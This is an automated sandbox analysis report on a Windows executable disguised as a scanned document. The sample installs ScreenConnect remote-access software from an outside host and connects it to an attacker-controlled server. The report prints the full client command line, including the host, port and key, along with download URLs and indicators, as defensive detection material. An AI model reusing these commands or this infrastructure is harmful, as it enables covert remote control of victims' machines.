Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Scan_doc_09_16_24_1120.exe

Overview

General Information

Sample name:Scan_doc_09_16_24_1120.exe
Analysis ID:1523878
MD5:3d6752aea446d36e3078f6ae7c0490a1
SHA1:71660374adf680ae661c675d1723bd5ab06c77a8
SHA256:8626a972070c42a888f9372155d32cb05a3f9140d607136e4f5680fb32c2bd77
Tags:exefiledn-comuser-JAMESWT_MHT
Infos:

Detection

ScreenConnect Tool
Score:66
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:33
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Creates files in the system32 config directory
Enables network access during safeboot for specific services
Initial sample is a PE file and has a suspicious name
Reads the Security eventlog
Reads the System eventlog
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

Process Tree

  • System is w10x64
  • Scan_doc_09_16_24_1120.exe (PID: 5572 cmdline: "C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe" MD5: 3D6752AEA446D36E3078F6AE7C0490A1)
    • dfsvc.exe (PID: 1196 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)
      • ScreenConnect.WindowsClient.exe (PID: 7664 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" MD5: 20AB8141D958A58AADE5E78671A719BF)
        • ScreenConnect.ClientService.exe (PID: 7700 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=73549b67-726b-470e-ab1a-fbbb83a6a15b&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • WerFault.exe (PID: 4500 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 684 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 5908 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 5672 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5572 -ip 5572 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 2608 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7204 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7472 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • ScreenConnect.ClientService.exe (PID: 7724 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=73549b67-726b-470e-ab1a-fbbb83a6a15b&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • ScreenConnect.WindowsClient.exe (PID: 7788 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "1714a821-0bba-4f94-9027-e5dd47ba7bd8" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)
    • ScreenConnect.WindowsClient.exe (PID: 7172 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "be4104e4-6414-4af7-ae9c-6dc20c5434ce" "System" MD5: 20AB8141D958A58AADE5E78671A719BF)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000000A.00000002.2285819740.000000001BC56000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        00000001.00000002.2784738148.0000022707EC3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          00000001.00000002.2784738148.00000227081F6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            0000000A.00000000.2273256028.0000000000FF2000.00000002.00000001.01000000.0000000C.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              0000000A.00000002.2284680562.00000000033A7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                Click to see the 3 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                10.0.ScreenConnect.WindowsClient.exe.ff0000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
                  Source: Network ConnectionAuthor: Nasreddine Bencherchali (Nextron Systems): Data: DestinationIp: 192.168.2.5, DestinationIsIpv6: false, DestinationPort: 49705, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 1196, Protocol: tcp, SourceIp: 178.215.236.119, SourceIsIpv6: false, SourcePort: 443
                  Sigma detected: Windows Processes Suspicious Parent Directory
                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 5908, ProcessName: svchost.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-02T06:23:00.190265+020020098971A Network Trojan was detected178.215.236.119443192.168.2.549722TCP
                  2024-10-02T06:23:01.313130+020020098971A Network Trojan was detected178.215.236.119443192.168.2.549723TCP
                  2024-10-02T06:23:05.234030+020020098971A Network Trojan was detected178.215.236.119443192.168.2.549729TCP
                  2024-10-02T06:23:06.357364+020020098971A Network Trojan was detected178.215.236.119443192.168.2.549731TCP
                  2024-10-02T06:23:07.756451+020020098971A Network Trojan was detected178.215.236.119443192.168.2.549734TCP
                  2024-10-02T06:23:08.886579+020020098971A Network Trojan was detected178.215.236.119443192.168.2.549739TCP
                  2024-10-02T06:23:11.300178+020020098971A Network Trojan was detected178.215.236.119443192.168.2.549742TCP
                  2024-10-02T06:23:13.032777+020020098971A Network Trojan was detected178.215.236.119443192.168.2.549743TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Multi AV Scanner detection for submitted file
                  Source: Scan_doc_09_16_24_1120.exeVirustotal: Detection: 13%Perma Link
                  Source: Scan_doc_09_16_24_1120.exeReversingLabs: Detection: 18%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 87.0% probability
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeCode function: 0_2_00831000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00831000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exeJump to behavior

                  Compliance

                  barindex
                  EXE planting / hijacking vulnerabilities found
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exeJump to behavior
                  Uses 32bit PE files
                  Source: Scan_doc_09_16_24_1120.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  PE / OLE file has a valid certificate
                  Source: Scan_doc_09_16_24_1120.exeStatic PE information: certificate valid
                  Uses secure TLS version for HTTPS connections
                  Source: unknownHTTPS traffic detected: 178.215.236.119:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Contains modern PE file flags such as dynamic base (ASLR) or NX
                  Source: Scan_doc_09_16_24_1120.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Binary contains paths to debug symbols
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.2784738148.00000227082D0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.00000227082E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270806A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022707F4C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2284476507.0000000001852000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: Scan_doc_09_16_24_1120.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2784738148.00000227082CC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022708353000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270806A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022707F47000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.2282591404.00000000024C2000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.3273020779.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000F.00000002.2941168266.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000F.00000002.2940865152.0000000003100000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.2273256028.0000000000FF2000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000B.00000000.2277621533.0000000000BCD000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2784738148.0000022707F43000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270806A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270838D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.00000227082C8000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2286646662.000000001C312000.00000002.00000001.01000000.00000012.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.2273256028.0000000000FF2000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000001.00000002.2784738148.0000022707F43000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270806A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270838D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.00000227082C8000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2286646662.000000001C312000.00000002.00000001.01000000.00000012.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.2784738148.00000227082D0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.00000227082E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270806A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022707F4C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2284476507.0000000001852000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2784738148.000002270806A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022707F3B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270802E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022707EC3000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.2283012190.0000000004B32000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeCode function: 0_2_00834A4B FindFirstFileExA,0_2_00834A4B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\Jump to behavior

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 178.215.236.119:443 -> 192.168.2.5:49722
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 178.215.236.119:443 -> 192.168.2.5:49723
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 178.215.236.119:443 -> 192.168.2.5:49729
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 178.215.236.119:443 -> 192.168.2.5:49734
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 178.215.236.119:443 -> 192.168.2.5:49731
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 178.215.236.119:443 -> 192.168.2.5:49739
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 178.215.236.119:443 -> 192.168.2.5:49742
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 178.215.236.119:443 -> 192.168.2.5:49743
                  Enables network access during safeboot for specific services
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeRegistry value created: NULL Service
                  Source: global trafficTCP traffic: 192.168.2.5:49745 -> 178.215.236.119:8041
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=73549b67-726b-470e-ab1a-fbbb83a6a15b&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: Joe Sandbox ViewIP Address: 178.215.236.119 178.215.236.119
                  Source: Joe Sandbox ViewASN Name: LVLT-10753US LVLT-10753US
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
